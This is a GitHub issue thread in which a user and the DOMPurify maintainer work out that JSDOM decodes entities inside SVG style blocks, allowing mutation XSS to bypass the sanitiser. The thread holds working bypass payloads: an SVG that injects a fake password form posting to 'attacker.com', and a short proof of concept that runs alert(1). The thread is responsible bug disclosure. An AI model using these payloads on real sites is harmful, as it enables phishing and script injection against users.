### ISSUE TITLE
Inconsistent results between local version and online version

### ISSUE THREAD

**Issue by davidsalvador-tf** [cure53/DOMPurify#520]
### Background & Context

We have an AWS lambda function that runs DOMPurify on every image received. We encounter some weird behavior as a certain malicious SVG is not being cleaned as expected: HTML injection is allowed. That same SVG file gets correctly sanitized when running it on https://cure53.de/purify.

### Our context

Our AWS lambda function looks something like this:
```javascript
const createDOMPurify = require('dompurify'); // v2.2.6
const JSDOM = require('jsdom').JSDOM;

const window = new JSDOM('').window; // v16.4.0
const DOMPurify = createDOMPurify(window);

// more stuff...

if (contentType === 'image/svg+xml') {
  const cleanImage = DOMPurify.sanitize(dirtyImage)
  return cleanImage
}
```

#### Scenario 1 (AWS Lambda)

When the value of `dirtyImage` is the following:
```javascript
const dirtyImage = `<?xml version="1.0" standalone="no"?>
<svg xmlns="http://www.w3.org/2000/svg">
  <style>
    img {
      list-style-image: url('eeeee<&sol;style&gt;&lt;foreignObject width="100%" height="100%"&gt;&lt;html xmlns="http://www.w3.org/1999/xhtml"&gt;
&lt;center&gt;&lt;h1 style&equals;&quot;font-size&colon;53px&semi;&quot;&gt;In order to continue&comma; please confirm your password on the box below&colon;
&lt;br/&gt;&lt;&sol;h1&gt;
&lt;form action&equals;&quot;http&colon;&sol;&sol;attacker&period;com&sol;stealpassword&period;html&quot; method&equals;&quot;get&quot;&gt;
&lt;input placeholder&equals;&apos;Password&apos; type&equals;&quot;password&quot; name&equals;&quot;password&quot; style&equals;&apos;font-size&colon;35px&semi;&apos;&sol;&gt;&lt;br &sol;&gt;&lt;br &sol;&gt;
&lt;input type&equals;&quot;submit&quot; style&equals;&quot;font-size&colon;65px&semi;&quot; &sol;&gt;
&lt;&sol;form&gt;
&lt;&sol;center&gt;

      &lt;&sol;html&gt;&lt;&sol;foreignObject&gt;&lt;style&gt;<e');
    }
  </style>
</svg>
`
```

The output of DOMPurify is:
```<svg xmlns="http://www.w3.org/2000/svg">
        <style>
          img {
            list-style-image: url('eeeee</style><foreignObject width="100%" height="100%"><html xmlns="http://www.w3.org/1999/xhtml">
      <center><h1 style="font-size:53px;">In order to continue, please confirm your password on the box below:
      <br/></h1>
      <form action="http://attacker.com/stealpassword.html" method="get">
      <input placeholder='Password' type="password" name="password" style='font-size:35px;'/><br /><br />
      <input type="submit" style="font-size:65px;" />
      </form>
      </center>
      
            </html></foreignObject><style>
      </style></svg>
```

#### Scenario 2 (Online version of DOMPurify)

When running the previous value of `dirtyImage` on https://cure53.de/purify we get the following output:
```
<svg xmlns="http://www.w3.org/2000/svg">
  <style>
    img {
      list-style-image: url('eeeee&lt;/style&gt;&lt;foreignObject width="100%" height="100%"&gt;&lt;html xmlns="http://www.w3.org/1999/xhtml"&gt;
&lt;center&gt;&lt;h1 style="font-size:53px;"&gt;In order to continue, please confirm your password on the box below:
&lt;br/&gt;&lt;/h1&gt;
&lt;form action="http://netfuzzer10.infinityfreeapp.com/index.html" method="get"&gt;
&lt;input placeholder='Password' type="password" name="password" style='font-size:35px;'/&gt;&lt;br /&gt;&lt;br /&gt;
&lt;input type="submit" style="font-size:65px;" /&gt;
&lt;/form&gt;
&lt;/center&gt;

      &lt;/html&gt;&lt;/foreignObject&gt;&lt;style&gt;
</style></svg>
```

#### Expected output

Seems like in our AWS Lambda, DOMPurify is decoding the HTML entities. However, when running the same payload on the online version we are getting different results.

**Comment by cure53** [comment]
Heya, the online version is just for testing and essentially a playground. There is no guarantee that the playground delivers 100% the same results as the release version :)

**Comment by cure53** [comment]
Upon further looking into this, maybe this is a JSDOM specific behavior? We basically do not convert any entities manually, if at all, the browser we utilize does it. Can you maybe help narrowing down the issue a bit more?

**Comment by cure53** [comment]
@davidsalvador-tf I had another look at this and I believe this might be an issue with JSDOM. I am not sure if this is our bug.

From what I can see (tested on RunKit), the entities are indeed decoded in the results from JSDOM (incorrect behavior) and they are not decoded on all tested browsers (correct behavior).

Would it make sense to file a bug against JSDOM for this? Not sure if we can do much here.

**Comment by cure53** [comment]
Or, in other words, the inconsistency is not between online version and local version but rather between browser and JSDOM. I think, at least :smile:

**Comment by davidsalvador-tf** [comment]
Thanks for the quick response!

Interesting, it does seem like a JSDOM bug then. I'll do that.

On a side note, how does this stand in terms of DOMPurify's security? If you're running DOMPurify on a browser you're not affected but if running it on NodeJS with JSDOM you are?

**Comment by cure53** [comment]
> On a side note, how does this stand in terms of DOMPurify's security? If you're running DOMPurify on a browser you're not affected but if running it on NodeJS with JSDOM you are?

I would say so, yes. This strikes me as an mXSS bug in JSDOM that needs an urgent fix.

**Comment by cure53** [comment]
Yup, just confirmed, this definitely gives you XSS. Nice find!

**Comment by cure53** [comment]
```javascript
const createDOMPurify = require('dompurify');
const JSDOM = require('jsdom').JSDOM;

const window = new JSDOM('').window;
const DOMPurify = createDOMPurify(window);

console.log(DOMPurify.sanitize(`
<?xml version="1.0" standalone="no"?>
<svg xmlns="http://www.w3.org/2000/svg">
  <style>
    img {
      list-style-image: url('eeeee<&sol;style&gt;&lt;&sol;svg&gt;&lt;script>alert(1)&lt;/script><e');
    }
  </style>
</svg>
`))
```

Tried on Runkit, pops the alert. Oh dear :D

**Comment by cure53** [comment]
@davidsalvador-tf Please let me know if you need any help with reporting this to JSDOM!

**Comment by cure53** [comment]
Deleting the ticket now, contact with JDSOM is established.
